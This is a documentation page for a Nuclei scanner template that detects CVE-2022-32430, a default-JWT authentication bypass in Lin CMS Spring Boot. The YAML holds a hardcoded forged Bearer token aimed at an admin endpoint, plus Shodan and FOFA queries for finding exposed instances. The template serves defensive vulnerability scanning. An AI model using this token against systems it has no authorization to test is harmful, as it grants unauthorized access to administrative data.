Skip to content
Nuclei Templates

Lin CMS Spring Boot - Default JWT Token

ID: CVE-2022-32430

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2022,lin-cms,auth-bypass,talelin

Description

Section titled “Description”

An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application.

YAML Source

Section titled “YAML Source”
id: CVE-2022-32430


info:
  name: Lin CMS Spring Boot - Default JWT Token
  author: DhiyaneshDK
  severity: high
  description: |
    An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application.
  reference:
    - https://github.com/TaleLin/lin-cms-spring-boot
    - https://web.archive.org/web/20220721190946/https://www.mesec.cn/archives/277
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32430
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-32430
    epss-score: 0.00227
    epss-percentile: 0.60316
    cpe: cpe:2.3:a:talelin:lin-cms-spring-boot:0.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: talelin
    product: lin-cms-spring-boot
    shodan-query: http.html:"心上无垢,林间有风"
    fofa-query: body="心上无垢,林间有风"
  tags: cve,cve2022,lin-cms,auth-bypass,talelin


http:
  - method: GET
    path:
      - "{{BaseURL}}/cms/admin/group/all"
    headers:
      Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"id":'
          - '"name":'
          - '"level":'
        condition: and


      - type: word
        part: header
        words:
          - 'application/json'


      - type: status
        status:
          - 200


      - type: word
        part: body
        words:
          - '<html'
          - '<body'
          - '<script'
        negative: true
# digest: 4b0a00483046022100fca6d52880d48f49d1b467c641c9e58e969c8b0f8cd81575eb1d7a49b01f2d55022100d01398e366a9652e2bfd6e8b33f13de4720760ba4c22c3e0a9f384d99846f970:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-32430.yaml"

View on Github